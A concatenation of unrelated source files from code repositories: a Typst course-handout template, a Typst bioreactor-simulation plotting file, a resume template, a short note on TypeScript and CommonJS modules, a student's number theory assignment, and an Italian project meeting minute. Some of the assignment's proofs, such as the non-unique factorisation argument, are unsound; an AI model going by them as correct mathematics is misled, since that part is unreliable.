#let remark = th.theorem.with(
TheoremCounter,
name: "Remark",
les_num: context g_les_num.get(),
les_num_symb: context g_les_num_symb.get(),
body_style: "normal",
numbered: false,
name_func: text
)
// default setup
#set math.equation(numbering: "(1)")
//doc style setup
#let conf(
paper: "a4",
head_numbering: "1.1.1",
font_rm: ("Meta Serif Pro", "Noto Serif Hebrew", "Noto Naskh Arabic"),
font_sf: ("Helvetica Neue LT W1G", "Noto Sans Hebrew", "Noto Sans Arabic"),
font_tt: ("Noto Sans Mono", "Helvetica Monospaced W1G", "PT Mono"),
font_math: ("STIX Two Math", "STIX Math"),
font_header: ("Helvetica Neue LT W1G", "Noto Sans Hebrew", "Noto Sans Arabic"),
font_footer: ("Helvetica Neue LT W1G", "Noto Sans Hebrew", "Noto Sans Arabic"),
lang: "en",
num: 0,
date: "00.00.0000",
disp: true,
name: "<NAME>!",
name_header: "Hello World!",
num_symb: "",
part: "Tel Aviv University",
chapter: "Subject",
//
info_file: "info",
class_id: "00",
activity: "Plan",
//
doc
) = {
let params = load_doc_params(info_file, class_id, activity)
let paper = params.paper
let num = params.num
let num_symb = params.num_symb
let date = params.date
let disp = params.display_sols
let name = params.name
let name_header = params.name + ". " + params.activity_name
let chapter = params.chapter
let part = params.part
let w_foot_b = "regular"
let w_foot_l = "extralight"
let w_foot_th = "thin"
let w_foot_eb = "bold"
let w_head_b = "medium"
let w_head_l = "light"
let n_top_above = 1.5 //number of lines above the header
let n_top_below = 1 // same, but below the header
let header_font_size = 0.9em
let n_bottom_above = 1
let n_bottom_below = 1
let footer_font_size = 0.75em
let n_header_height = 2
let n_footer_height = 4
//how many lines fit in the paper (REQUIRES A FIX)
let baselines_num = calc.floor(297mm / glob_baselineskip)
let paper_excess = 297mm - baselines_num * glob_baselineskip
let page_num_display(
page: 0,
total: 0,
lang: "en",
weight_page: "bold",
weight_words: "light"
) = {
if lang == "he" {
text(weight: weight_words)[עמוד]
[ ]
str(page)
text(weight: weight_words)[ מתוך ]
str(total)
} else {
text(weight: weight_words)[Page ]
str(page)
text(weight: weight_words)[ of ]
str(total)
}
}
set page(
paper: paper,
columns: 1,
margin: (
left: 2*glob_baselineskip,
right: 2*glob_baselineskip,
top: ( n_top_above + n_header_height + n_top_below ) * glob_baselineskip,
bottom: (n_bottom_above + n_footer_height + n_bottom_below) * glob_baselineskip + paper_excess - 1mm
// -1 mm is a fix, because otherwise the last line in the text doesn't fit
),
header-ascent: 0%,
header: context {
rect(
inset: 0pt,
outset: 0pt,
height: 2 * glob_baselineskip,
width: 100%,
stroke: 0mm
)[#{
set text(
stretch: 50%,
font: font_header,
size: header_font_size,
weight: w_head_b,
historical-ligatures: false,
discretionary-ligatures: false
)
set par(leading: glob_rel_leading*0.5)
if text.lang == "he" {
params.chapter_he + " " + params.chapter_ar + " " + params.chapter_en
h(1fr)
"" + params.date_en + " " + params.date_he
linebreak()
text(
weight: w_head_l
)[#{
params.part_he + " " + params.part_ar + " " + params.part_en
h(1fr)
if num != none {
"" + str(num) + str(num_symb) + [. ]
name_header
} else {
name_header
}
//part + h(1fr) + str(num) + str(num_symb) + [. ] + name_header
}]
} else {
chapter + h(1fr) + date
linebreak()
text(
weight: w_head_l
)[#{
if num != none {
part + h(1fr) + str(num) + str(num_symb) + [. ] + name_header
} else {
part + h(1fr) + name_header
}
}]
}
}]
v(glob_b - glob_baselineskip + n_top_below * glob_baselineskip)
},
footer: {
v(n_bottom_above * glob_baselineskip)
rect(
inset: 0pt,
outset: 0pt,
height: 3 * glob_baselineskip,
width: 100%,
stroke: 0.0mm
)[#{
v(glob_b - glob_baselineskip)
set text(
stretch: 50%,
font: font_footer,
size: footer_font_size,
weight: w_foot_b,
historical-ligatures: false,
discretionary-ligatures: false,
dir: ltr
)
set par(leading: glob_rel_leading*0.45)
params.lecturer_position_en
[: ]
text(weight: w_foot_l)[#params.lecturer_name_en ]
link("mailto:" + params.lecturer_email)[
#text(font: font_tt, weight: w_foot_l)[#params.lecturer_email]
]
h(1fr)
text(weight: w_foot_l)[#params.lecturer_name_he ]
[] + params.lecturer_position_he + [: ]
linebreak()
params.teacher_position_en
[: ]
text(weight: w_foot_l)[#params.teacher_name.en ]
link("mailto:" + params.teacher_email)[
#text(font: font_tt, weight: w_foot_l)[#params.teacher_email]
]
h(1fr)
text(weight: w_foot_l)[#params.teacher_name.he ]
[] + params.teacher_position_he + [: ]
linebreak()
params.reception_name_en + [: ]
text(weight: w_foot_l)[#params.reception_time_en]
h(1fr)
text(weight: w_foot_l)[#params.reception_time_he]
[] + params.reception_name_he + [: ]
linebreak()
params.course_period_word_en + [: ]
text(weight: w_foot_l)[#params.course_period_en]
h(1fr)
text(weight: w_foot_l)[#params.course_period_he]
[] + params.course_period_word_he + [: ]
if params.link_to_cc != none {
linebreak()
params.link_word_en + [: ]
link("https://" + params.link_to_cc)[
#text(font: font_tt, weight: w_foot_l)[#params.link_to_cc]
]
h(1fr)
text(weight: w_foot_l)[#sym.arrow.l.filled]
[] + params.link_word_he + [: ]
}
linebreak()
text(
weight: w_foot_th,
font: font_sf,
stretch: 50%,
size: 0.8em
)[#params.pdf_info]
h(1fr)
text(
stretch: 100%,
weight: w_foot_eb
)[#{
context {
page_num_display(
page: counter(page).display(),
total: counter(page).final().first(),
lang: lang,
weight_page: w_foot_eb,
weight_words: w_foot_l
)
}
}]
}]
v(n_bottom_below * glob_baselineskip)
},
footer-descent: 0%
)
set text(
font: font_rm,
lang: lang,
size: glob_font_size,
number-type: "lining",
number-width: "tabular",
top-edge: "cap-height",
bottom-edge: "baseline",
//features: ("calt", "case", "salt"),
//discretionary-ligatures: true,
historical-ligatures: true,
fractions: false,
)
set par(
justify: true,
linebreaks: "optimized",
leading: glob_rel_leading
)
show par: set block(
spacing: glob_parskip
)
set outline(
indent: true,
depth: 4
)
show heading.where(
level: 1
): it => block(
width: 100%,
above: glob_b,
below: glob_b,
)[#{
set text(
22pt,
weight: 900,
font: font_sf,
stretch: 100%
)
context {
if g_les_num.get() != none {
str(g_les_num.get())
str(g_les_num_symb.get())
[. ]
}
}
smallcaps(it.body)
}]
show heading.where(
level: 2
): { it => block(
width: 100%,
below: glob_b,
above: glob_b
)[#{
set text(
16pt,
weight: 700,
font: font_sf
)
[§ ]
smallcaps(it.body)
}] }
show math.equation: set text(
font: font_math,
size: 1.05em
)
//show "LHS": smallcaps
set enum(
numbering: {
(..nums) => {
if nums.pos().len() == 1 {
set text(weight: "extrabold")
"("
nums.pos().map(str).first()
")"
} else {
"("
set text(weight: "bold")
nums.pos().map(str).first()
"."
set text(weight: "medium")
nums.pos().slice(1).map(str).join(".")
")"
}
}
},
full: true,
indent: 0.5em,
number-align: start + top,
spacing: glob_b * 0.5,
tight: false
)
set math.equation(
numbering: {
(..nums) => {
set text(
weight: "light",
font: font_rm,
style: "normal",
stretch: 100%,
ligatures: false,
)
"("
context{
if g_les_num.get() != none {
str(g_les_num.get())
g_les_num_symb.get()
[.]
}
}
{
set text(
weight: "regular"
)
numbering("א", nums.pos().first())
}
")"
}
}
)
set figure(
numbering: {
(..nums) => {
set text(
weight: "regular",
font: font_rm,
style: "normal",
stretch: 100%,
ligatures: false,
)
context{
if g_les_num.get() != none {
str(g_les_num.get())
g_les_num_symb.get()
[.]
}
}
numbering("1", nums.pos().first())
}
}
)
show figure.caption: set text(size: 0.7em)
//show "ODE": smallcaps[ode]
//show regex("DE"): smallcaps[de]
//show "LHS": smallcaps[lhs]
//show "RHS": smallcaps[rhs]
g_sol_disp.update(disp)
g_les_num.update(num)
g_les_num_symb.update(num_symb)
glob_font_rm.update(font_rm)
glob_font_sf.update(font_sf)
glob_font_tt.update(font_tt)
doc
}
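// A minimal usage sketch of `conf` in a handout file. The values below are
// simply the function's own defaults; real documents must point `info_file`,
// `class_id`, and `activity` at entries that exist in the info yaml file:
//   #show: conf.with(info_file: "info", class_id: "00", activity: "Plan")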
#let important(title, body) = {
context {
box.slantedColorbox(
title: title,
col_back: rgb(230, 232, 244),
col_stroke: rgb(9, 31, 146),//navy,
col_title: rgb(9, 31, 146),
col_text_title: white,
col_text_body: black,
font_body: glob_font_rm.get(),
font_title: glob_font_sf.get(),
font_emoji: "Noto Emoji",
emoji: emoji.finger.r,
radius: 0pt,
width: auto,
body
)
}
}
#let attention(title, body) = {
context {
box.slantedColorbox(
title: title,
col_back: rgb(255,230,234),
col_stroke: rgb(153,0,26),
col_title: rgb(153,0,26),
col_text_title: white,
col_text_body: black,
font_body: glob_font_rm.get(),
font_title: glob_font_sf.get(),
font_emoji: "Noto Emoji",
emoji: emoji.siren,
radius: 0pt,
width: auto,
body
)
}
}
#let footnote_dict(
term,
def,
// alternative spelling
alt: none,
// part of speech
pos: none,
// note such as obsolete, slang etc
note: none,
// pronunciation
pro: none
) = {
footnote({
context {
text(font: glob_font_sf.get(), weight: 700)[#smallcaps(term)]
if alt != none {
text(font: glob_font_sf.get(), style: "italic", weight: 300, size: 0.9em)[ or]
text(font: glob_font_sf.get(), weight: 700)[ #smallcaps(alt)]
}
if pro != none { text(font: "Doulos SIL", fallback: false)[ /#sym.space.thin#pro#sym.space.thin/] }
if pos != none { text(font: glob_font_sf.get(), style: "italic", weight: 300, size: 0.9em)[ #pos] }
if note != none { text(font: glob_font_sf.get(), style: "italic", weight: 300, size: 0.9em)[ (#note)] }
[ ] + def
}
})
}
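// Example usage of `footnote_dict` (the term, definition, and tags below are
// illustrative, not taken from any real handout):
//   #footnote_dict(
//     "colloquium",
//     [an academic seminar or conference],
//     pos: "noun",
//     note: "formal",
//   )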
//logical break
#let br_log() = {
block(
width: 100%,
height: glob_baselineskip,
//spacing: - 0.5 * glob_baselineskip
)[
#align(
center + horizon,
text(size: 2em)[#sym.ast #sym.ast #sym.ast])
]
}
#let class_optional(body) = {
set text(size: 0.85em)
br_log()
body
br_log()
}
#let acr(text) = {smallcaps[#text]}
|
https://github.com/Tiggax/zakljucna_naloga | https://raw.githubusercontent.com/Tiggax/zakljucna_naloga/main/src/figures/simulation.typ | typst | #import "../additional.typ": todo
#import "@preview/cetz:0.2.2": canvas, plot, draw, vector
#import "@preview/oxifmt:0.2.1": strfmt
#let get_plot(target) = {
let plots = csv(target + ".csv", row-type: dictionary).map(
((minutes, volume, vcd,glutamin,glucose,DO,c_O2,oxygen,product)) => (
minutes: float(minutes),
volume: float(volume),
vcd: float(vcd),
glutamin: float(glutamin),
glucose: float(glucose),
DO: float(DO),
cO2: float(c_O2),
oxygen: float(oxygen),
product: float(product),
))
canvas(
length: 1cm,
{
plot.plot(
size: (16,10),
legend: "legend.inner-north-west",
x-label: "days",
y-label: "values",
x-format: x => {
let min = x
let days = calc.floor(x / (60 * 24))
[#days]
},
{
plot.add(
label: "volume",
plots.map(x => (x.minutes, x.volume)),
)
plot.add(
label: "VCD",
plots.map(x => (x.minutes, x.vcd)),
)
plot.add(
label: "glutamin",
plots.map(x => (x.minutes, x.glutamin)),
)
plot.add(
label: "glucose",
plots.map(x => (x.minutes, x.glucose)),
)
plot.add(
label: "DO",
plots.map(x => (x.minutes, x.DO)),
)
plot.add(
label: "PID",
plots.map(x => (x.minutes, x.oxygen)),
)
plot.add(
label: "product",
plots.map(x => (x.minutes, x.product)),
)
}
)
}
)
}
#let cnt = 0
#let results(target) = {
// NOTE: `get_table` is not defined in this file; it is assumed to be provided elsewhere.
return (plot: get_plot(target), const_table: get_table(target))
}
#let line(key, val, depth) ={
let t = "min"
let vals = (
mu_max: $"MVC"/("ml" #t)$,
power_input: $W / m^3$,
ks_glucose: $g/L$,
ks_glutamine: $g/L$,
n_vcd: none,
day: $"day"$,
product: $(m g)/("MVC" #t)$,
k_glucose: $"MVC"/#t$,
k_glutamine: $"MVC"/#t$,
kP: none,
kDO: $"mol"/ L$,
cell_metabolism: $"mol"/("cell" #t)$,
air_flow: $L / #t$,
henry: $"mol" / ("bar" L)$,
minimum: $%$,
fi_oxygen_max: $L / #t$,
max_flow: $L / #t$,
volume: $L$,
vcd: [$(M V C) / (m L)$ #footnote[Million Viable Cells per $m L$]],
glucose: $g/L$,
glutamine: $g/L$,
oxygen_part: $%$,
start: $d a y$,
rate: [$(%"IWV")/"day"$ #footnote[% Initial Working Volume per day]],
)
if type(val) == float {
((
table.cell(key.replace("_", " "),fill: aqua.transparentize(80%)),
table.cell([#val], colspan: depth - 1, align: right ),
table.cell(vals.at(key,default: [TODO: add unit]), inset: .6em)
),)
} else {
let height = val.values().map(x => if type(x) == float {1} else {x.len()}).sum()
(
table.cell(key.replace("_", " "), rowspan: height, fill: aqua.transparentize(60%)),
for ((k,v)) in val {
line(k,v,depth - 1)
}
)
}
}
#let constants(name) = {
let values = json("/data/" + name + ".json")
let a = for ((k,v)) in values {
line(k,v,4)
}
table(
columns: 5 ,
..a.flatten()
)
}
#constants("default")
#let diff(a,b) = {
if type(a) == float {
if a != b {
return a
}
} else {
let out = (:)
for ((k,v)) in a {
let res = diff(v,b.at(k))
if res != none {
out.insert(k, res)
}
}
return if out != (:) { out }
}
}
#let constants_diff(name) = {
let default = json("/data/default.json")
let values = json("/data/" + name + ".json")
let out = (:)
for ((k,v)) in values {
let res = diff(v, default.at(k))
if res != none {
out.insert(k, res)
}
}
let a = for ((k,v)) in out {
line(k,v,4)
}
table(
columns: 5 ,
..a.flatten()
)
} |
|
https://github.com/dark-flames/resume | https://raw.githubusercontent.com/dark-flames/resume/main/resume.typ | typst | MIT License | #import "chicv.typ": *
#import "libs.typ": *
#import "data.typ": *
#let resume(env) = [
#show: chicv
#name(env)
#links(env)
#edu(env)
#interest(env)
#research(env)
#work(env)
#openSource(env)
#project(env)
#if is-cv(env) {
new-page(env)
}
#skill(env)
#award(env)
#pub(env)
]
|
https://github.com/ymgyt/techbook | https://raw.githubusercontent.com/ymgyt/techbook/master/programmings/js/typescript/specification/module.md | markdown | # module
* A module is a JS file that contains at least one import or export
* Modules always run in strict mode
* A module is evaluated only on its first import; after that the result is cached
## ES Module
* TypeScript uses this
## CommonJS
```typescript
const pkg1 = require("package1");
```
* Use this on the server side (Node.js)
* Uses `require()`
* Loads `.js` and `.ts` files (`.js` takes precedence)
* Packages must live under the `node_modules` directory
* Local modules are specified by a path relative to the calling file
* If a directory is given, the `index.{js,ts}` inside it is loaded
### exports
util.js
```typescript
exports.increment = (i) => i + 1;
```
index.js
```typescript
const util = require("./util");
util.increment(1);
// 分割代入もできる
const { increment } = require("./util");
increment(3);
```
|
|
https://github.com/AxiomOfChoices/Typst | https://raw.githubusercontent.com/AxiomOfChoices/Typst/master/Courses/Math%2018_785%20-%20Number%20Theory/Assignments/Assignment%201.typ | typst | #import "/Templates/generic.typ": latex, header
#import "@preview/ctheorems:1.1.0": *
#import "/Templates/math.typ": *
#import "/Templates/assignment.typ": *
#show: doc => header(title: "Assignment 1", name: "<NAME>", doc)
#show: latex
#show: NumberingAfter
#show: thmrules
#let col(x, clr) = text(fill: clr)[$#x$]
#let pb() = {
pagebreak(weak: true)
}
#set page(numbering: "1")
#let bar(el) = $overline(#el)$
*Sources consulted* \
Classmates: <NAME>, <NAME>, <NAME>. \
Texts: Class Notes, Algebraic Number Theory by Milne, Elementary and Analytic Theory of Algebraic Numbers by Narkiewicz.
= Question
== Statement
Write down a monic polynomial $f in ZZ[x]$ with $sqrt(2) + sqrt(3)$ as a root.
== Solution
The polynomial is
$
f(x) = x^4 - 10x^2 + 1
$
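A quick check that this works: writing $x = sqrt(2) + sqrt(3)$ gives
$
x^2 = 5 + 2 sqrt(6), quad (x^2 - 5)^2 = 24, quad x^4 - 10 x^2 + 1 = 0,
$
so $x$ is indeed a root of $f$.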
= Question
== Statement
Let $K = QQ(sqrt(d))$ with $d != 0,1$ a square free integer, and let $frak(p)$ be a nonzero prime ideal of the ring of integers $cal(O)_k$ that does not divide $(2d)$.
+ Show that $frak(p)$ can be written in the form $(p, alpha)$, with $(p) = frak(p) sect ZZ$ and $alpha in cal(O)_k$.
+ Show that $cal(O)_k quo frak(p) tilde.eq FF_q$ where $[ cal(O)_k : frak(p) ]$ is either $p$ or $p^2$. Give an explicit criterion in terms of $p$ and $d$ for which case occurs.
== Solution
Since $frak(p)$ is a nonzero prime ideal of $cal(O)_k$, its contraction $frak(p) sect ZZ$ is a nonzero prime ideal of $ZZ$, so it is of the form $(p)$ for some prime $p$.
Now we have the integral extension
$
FF_p tilde.equiv ZZ quo (p) seq cal(O)_k quo frak(p)
$
so $cal(O)_k quo frak(p)$ is an integral extension of a field and thus itself a field. But now we know that
$
cal(O)_k = cases(ZZ[sqrt(d)] : d = 2\,3 mod 4, ZZ[(1+sqrt(d))/2] : d = 1 mod 4).
$
We check the two cases separately, if $d = 2,3 mod 4$ then $cal(O)_k = ZZ[x] quo (x^2-d)$ and so
$
cal(O)_k quo (p) iso ZZ[x] quo (x^2 - d, p) iso FF_p [x] quo (x^2 - d)
$
Now if $d$ is not a square in $FF_p$ then this polynomial does not split and so $cal(O)_k quo (p)$ is a field and thus $(p)$ is maximal hence $(p) = frak(p)$ so choosing $alpha = p$ makes $(p, alpha) = (p) = frak(p)$. If $d$ is a square then $x^2 - d$ factors as $(x-sqrt(d))(x+sqrt(d))$ and thus we get
$
cal(O)_k quo (p) iso FF_p times FF_p.
$
In this case we pick $alpha$ to be any representative of $(0,1)$ or $(1,0)$ in $cal(O)_k quo (p)$; then $cal(O)_k quo (p, alpha)$ is a field, so $(p, alpha)$ is a maximal ideal and hence prime.
On the other hand if $d = 1 mod 4$ then $cal(O)_k = ZZ[x] quo (x^2 - x + (1 - d)/4)$, so we do a similar calculation
$
cal(O)_k quo (p) iso ZZ[x] quo (x^2 - x + (1-d) / 4, p)
iso FF_p [x] quo (x^2 - x + (1-d) / 4)
$
Now again if $d$ is a square $mod p$ then this polynomial factors as
$
(x-(1+sqrt(d)) / 2)(x-(1-sqrt(d)) / 2)
$
and if not then we get a field, and the exact same reasoning follows in both cases. We thus get a solution to both parts of the question, in the case where $d$ is not a square in $FF_p$ we pick $alpha = p$ and get $cal(O)_k quo frak(p) iso FF_(p^2)$. In the case where $d = n^2 mod p$ we have $cal(O)_k quo (p) = FF_p times FF_p$ and picking $alpha$ to be a representative of $(0,1)$ we get $cal(O)_k quo (p, alpha) = FF_p$.
= Question
== Statement
Let $K = QQ(zeta_5)$ be the number field generated by a primitive 5th root of unity $zeta_5$. Show that $K times.circle_QQ RR$ is isomorphic to $RR^4$ as an $RR$-vector space but not as an $RR$-algebra.
== Solution
Clearly $1 times.circle 1, zeta_5 times.circle 1, zeta_5^2 times.circle 1, zeta_5^3 times.circle 1$ form a basis for $K times.circle_QQ RR$ as an $RR$-vector space, so it is isomorphic to $RR^4$. Now consider multiplication in $RR^4$: no element $(a,b,c,d) in RR^4$ can have multiplicative order $5$, because that would mean $a^5 = b^5 = c^5 = d^5 = 1$, which over $RR$ implies $a = b = c = d = 1$, giving order $1$. However, $zeta_5 times.circle 1$ does have multiplicative order $5$ in $K times.circle_QQ RR$, so the two algebras cannot be isomorphic.
= Question
== Statement
Show that the ring $A = ZZ[sqrt(2)]$ is euclidean.
== Solution
We define the norm $abs(a + b sqrt(2)) = abs(a^2 - 2b^2)$, let us check that it is multiplicative.
$
abs((a + b sqrt(2))(c + d sqrt(2)))
&= abs(a c + 2 b d + (a d + b c) sqrt(2))
\ &= abs((a c + 2 b d)^2 - 2(a d + b c)^2)
\ &= abs(a^2 c^2 + 4 a b c d + 4 b^2 d^2 - 2 a^2 d^2 - 4a b c d - 2 b^2 c^2)
\ &= abs(a^2 c^2 + 4 b^2 d^2 - 2 a^2 d^2 - 2 b^2 c^2)
$
and
$
abs(a+b sqrt(2)) abs(c + d sqrt(2))
= abs((a^2 - 2b^2)(c^2 - 2d^2))
= abs(a^2 c^2 - 2b^2 c^2 - 2a^2d^2 + 4b^2 d^2)
$
We check now that it is a euclidean norm, assume we are given $x,y in ZZ[sqrt(2)]$ and set $z = x/y in QQ(sqrt(2))$. We write $z = a + b sqrt(2)$ for $a,b in QQ$, then round $a,b$ to the nearest integers to get $n,m$, we then have
$
abs((n + m sqrt(2)) - (a + b sqrt(2)))
&= abs((n - a) + (m - b)sqrt(2))
\ &= abs((n-a)^2 - 2(m - b)^2)
\ &<= abs(n-a)^2 + 2 abs(m - b)^2
\ &<= 1 / 4 + 2 / 4 = 3 / 4
$
Now set $q = n + m sqrt(2)$ and compute
$
abs(x - q y) = abs(y(x/y- q)) = abs(y) abs(x/y - q) = abs(y) abs(z - q) <= 3 / 4 abs(y)
$
so indeed this norm is euclidean.
= Question
== Statement
Show that the units of $A = ZZ[sqrt(2)]$ are given by $plus.minus (1 + sqrt(2))^n, n in ZZ$.
== Solution
We use again the norm we had before and note that if $a + b sqrt(2)$ is a unit then it must have norm 1. Now solving for that we get
$
a^2 - 2b^2 = plus.minus 1
$
which we need to analyze the solutions of. We will do this by an infinite descent method, it is clear that for $a = 1$ the only solutions are $b=-1,0,1$, so we assume that $abs(a) > 1$. We can also assume WLOG that $a$ and $b$ are positive, as otherwise we can replace them with the conjugate to force that to be the case. We now multiply $a + b sqrt(2)$ by $1 - sqrt(2)$, expanding this we get
$
(a + b sqrt(2)) (1 - sqrt(2)) = (a - 2b) + (b - a) sqrt(2).
$
We now claim that $abs(a - 2b) < abs(a)$, if this is not the case then we must have $abs(b) >= abs(a)$, but since $a^2 - 2b^2 = plus.minus 1$ then
$
a^2 + 1 >= 2 b^2 >= 2 a^2
$
which is not possible if $abs(a) > 1$. We thus have that after this multiplication $abs(a)$ became strictly smaller, so we can repeat this until we get $abs(a) = 1$. Thus we get
$
(a+b sqrt(2)) (1 - sqrt(2))^n = -1,1
$
which when rearranged proves exactly the result.
= Question
== Statement
Show that the discriminant $Delta_k$ of a number field $K$ is always $0,1 mod 4$.
== Solution
We know that $Delta_k$ can be written as $det (rho_i alpha_j)^2$ where $rho_i$ are embeddings of $K$ into $CC$. Now a determinant can be written as a sum
$
det (rho_i alpha_j)
= sum_(sigma in S_n) op("sgn")(sigma) product_(i=1)^n rho_i alpha_(sigma(j))
$
now we can split this sum according to the sign of the permutation: let $A$ be the sum of the terms coming from even permutations and $B$ the sum coming from odd permutations, so the determinant is $A - B$. Then we can write
$
Delta_k = (A-B)^2 = (A + B)^2 - 4 A B
$
Now the action of an element $phi$ of the Galois group permutes the $rho_i$'s in either an even or an odd fashion; if even, it fixes $A$ and $B$, otherwise it swaps them. Either way, $A + B$ and $A B$ are fixed. Thus $A + B$ is fixed by the Galois group and hence a rational number; it is also a sum of products of integral elements and thus integral, so it is an integer, and similarly for $A B$. We therefore have $Delta_k mod 4 = (A + B)^2 mod 4 = 0,1 mod 4$.
= Question
== Statement
Show that the ideals in the ring $ZZ[sqrt(-3)]$ do not necessarily factor uniquely into products of prime ideals.
== Solution
Consider the ideal $(2, 1 + sqrt(-3))$, we have
$
(2, 1 + sqrt(-3)) (2,1 + sqrt(-3))
&= (4,2+2sqrt(-3),-2+2sqrt(-3))
= (4, 2 + 2 sqrt(-3))
\ &= (2)(2, 1 + sqrt(-3)).
$
Thus if both $(2, 1 + sqrt(-3))$ and $(2)$ are uniquely factored into prime ideals then $(2, 1 + sqrt(-3))^2$ definitely cannot be.
= Question
== Statement
Let $K = QQ(2^(1 slash 3))$. Show that $O_K$ is monogenic (with generator $theta = 2^(1/3)$).
== Solution
#let al = $2^(1 slash 3)$
#let al2 = $2^(2 slash 3)$
First we compute the discriminant, it turns out to be
$
det mat(3,0,0;0,0,6;0,6,0) = - 108.
$
Now assume that $2 divides [ O_K : ZZ[2^(1 slash 3)]]$, then we have
$
(a_0 + a_1 al + a_2 al2) / 2 in O_K
$
for some $a_0, a_1, a_2$, at least one of which is not divisible by 2; if it is $a_0$ then we have
$
al2 (a_0 + a_1 al + a_2 al2) / 2 = a_0 / 2 al2 + (a_1 + a_2 al)
$
so we have $a_0 al2 / 2 in O_K$. If it is instead $a_1$ or $a_2$ that is not divisible by $2$, then a similar calculation shows that $a_1 al2 / 2$ or $a_2 al2 / 2$ is in $O_K$; we shall assume WLOG it is $a_0$. We thus have
$
8 N_(K quo QQ) (a_0 al2 / 2) = N_(K quo QQ) (a_0 al2) = a_0^3 N_(K quo QQ) (
al
)^2
$
But we know that $N_(K quo QQ) (al)$ is equal (up to a sign) to the constant term in the minimal polynomial of $al$ which is $2$. So we get
$
2 N_(K quo QQ) (a_0 al2 / 2) = a_0^3
$
and so $2$ does in fact divide $a_0$, contradicting the choice of $a_0$ and proving that $2 divides.not [O_k : ZZ[al]]$.
We now replace the minimal polynomial $f(x) = x^3 - 2$ with $f(x+2) = x^3 + 6x^2 + 12 x + 6$. Now the roots of this polynomial in the algebraic closure have all been shifted, but since we have the formula $product_(i < j) (theta_i - theta_j)^2$ for the discriminant, where $theta_i$ are the roots, we know that the discriminant has not changed. Now assume that $3 divides [O_K : ZZ[al]]$, then we have that
$
(b_0 + b_1 (al - 2) + b_2 (al - 2)^2) / 3 in O_k
$
for some $b_0,b_1,b_2$ such that at least one is not divisible by $3$. By the exact same argument as before we have for some $b_i$ that is not divisible by 3
$
27 N_(K quo QQ) (b_i ((al - 2)^2) / 3)
= N_(K quo QQ) (b_i (al - 2)^2)
= b_i^3 (N_(K quo QQ) (al - 2))^2
$
and again we know that $N_(K quo QQ) (al - 2) = 6$ up to a sign. This gives us
$
3 N_(K quo QQ) (b_i ((al - 2)^2) / 3) = 4 b_i^3
$
and so $b_i$ is divisible by 3. This shows that $3 divides.not [O_k : ZZ[al]]$, so since $[O_k : ZZ[al]] divides 108$ this shows that $[O_k : ZZ[al]] = 1$. Hence $O_k = ZZ[al]$ so $O_k$ is monogenic.
#counter(heading).step()
= Question
== Statement
Consider $O_K$ for $K = QQ[theta]$ where $theta$ is a root of $f(X) = X^3 - X - 4$, is it monogenic? Explain.
== Solution
We compute the discriminant, to do so we need to get the minimal polynomial for $theta^2,theta^3$ and $theta^4$. For $theta^2$ we get
$
theta^4 = theta(theta + 4) = theta^2 + 4 theta\
theta^6 = (theta + 4)^2 = theta^2 + 8 theta + 16
$
so
$
(theta^2)^3 - 2 (theta^2)^2 + theta^2 - 16 = 0
$
for $theta^3$ we get
$
theta^3 = theta + 4 \
theta^6 = theta^2 + 8 theta + 16 \
theta^9 = (theta + 4)^3 = theta^3 + 12 theta^2 + 48 theta + 64
= 12 theta^2 + 49 theta + 68
$
so
$
(theta^3)^3 - 12 (theta^3)^2 = -47 theta - 124\
(theta^3)^3 - 12 (theta^3)^2 + 47 (theta^3) = 64.
$
Finally for $theta^4$ we have
$
theta^4 = theta^2 + 4 theta\
theta^8 = (theta^2 + 4 theta)^2 = theta^4 + 8 theta^3 + 16 theta^2
= theta^2 + 4 theta + 8 theta + 32 + 16 theta^2
= 17 theta^2 + 12 theta + 32\
theta^12 = (theta + 4)^4 = theta^4 + 16 theta^3 + 96 theta^2 + 256 theta + 256
= 97 theta^2 + 276 theta + 320
$
so we get
$
(theta^4)^3 - 2 (theta^4)^2 - 63 (theta^4) - 256 = 0.
$
Now the trace is equal to the negative of the second coefficient in the minimal polynomial, so we get $tr(theta) = 0, tr(theta^2) = 2, tr(theta^3) = 12, tr(theta^4) = 2$. Plugging this into a matrix gives us
$
Delta(1,theta,theta^2) = det mat(3,0,2;0,2,12;2,12,2) = -428 = -2^2 dot 107.
$
Now I claim that $ZZ[(theta+theta^2)/2] seq O_K$, first note that if $alpha = (theta + theta^2)/2$ then
$
alpha^2 = (2 theta^2 + 6 theta + 8) / 4\
alpha^3 = 1 / 8 (2 theta^2 + 6 theta + 8)(theta + theta^2)
= 1 / 8 (2 theta^4 + 2 theta^3 + 6 theta^3 + 6 theta^2 + 8theta^2 + 8 theta)
\ = 1 / 8 (2 theta^2 + 8 theta + 8 theta + 32 + 14theta^2 + 8 theta) = 1 / 8 (
16theta^2 + 24 theta + 32
) = 2 theta^2 + 3 theta + 4.
$
Thus we have that $alpha$ is a root of
$
X^3 - X^2 - 3 X - 2 = 0
$
and thus clearly in $O_K$. Now $theta in ZZ[alpha]$ because
$
((theta+theta^2) / 2)^2
- (theta + theta^2) / 2
= (theta^4 + 2 theta^3 + theta^2) / 4 - (theta + theta^2) / 2
\ = (theta^2 + 4theta + 2theta + 8 + theta^2) / 4 - (2theta + 2theta^2) / 4
= (4theta + 8) / 4
= theta + 2
$
so we can consider the discriminant of $1,theta,alpha$. We have
$
tr(theta) = 0, \
tr(alpha) = (tr(theta^2) + tr(theta)) / 2 = 1,\
tr(theta^2) = 2,\
tr(alpha^2) = (2 tr(theta^2) + 6 tr(theta) + tr(8)) / 4 = (4 + 0 +24) / 4 = 7, \
tr(theta alpha) = (tr(theta^3 + theta^2)) / 2
= (tr(theta + 4 + theta^2)) / 2
= (2 + 12) / 2 = 7.
$
This gives us
$
Delta(1,theta,alpha) = det mat(3,0,1;0,2,7;1,7,7) = -107
$
which is prime and thus square free and thus equal to $Delta_K$, meaning that $O_K = ZZ[alpha]$ is monogenic.
|
|
https://github.com/Error-418-SWE/Documenti | https://raw.githubusercontent.com/Error-418-SWE/Documenti/src/3%20-%20PB/Documentazione%20interna/Verbali/24-03-22/24-03-22.typ | typst | #import "/template.typ": *
#show: project.with(
date: "22/03/24",
subTitle: "Meeting post colloquio con il Proponente",
docType: "verbale",
authors: (
"<NAME>",
),
reviewers: (
"<NAME>",
),
missingMembers: (
"<NAME>",
),
timeStart: "16:30",
timeEnd: "17:00",
);
= Agenda
Following the meeting with the Proponent, the team held an internal meeting covering:
- Considerations arising from the external meeting;
- Planning.
== Considerations arising from the external meeting
The team is satisfied with the meeting held, since:
- the Proponent appreciated the UI and the features of the MVP;
- the Proponent's advice on implementing the manual placement of a product in a bin proved excellent, as it will simplify the development of that feature.
== Planning
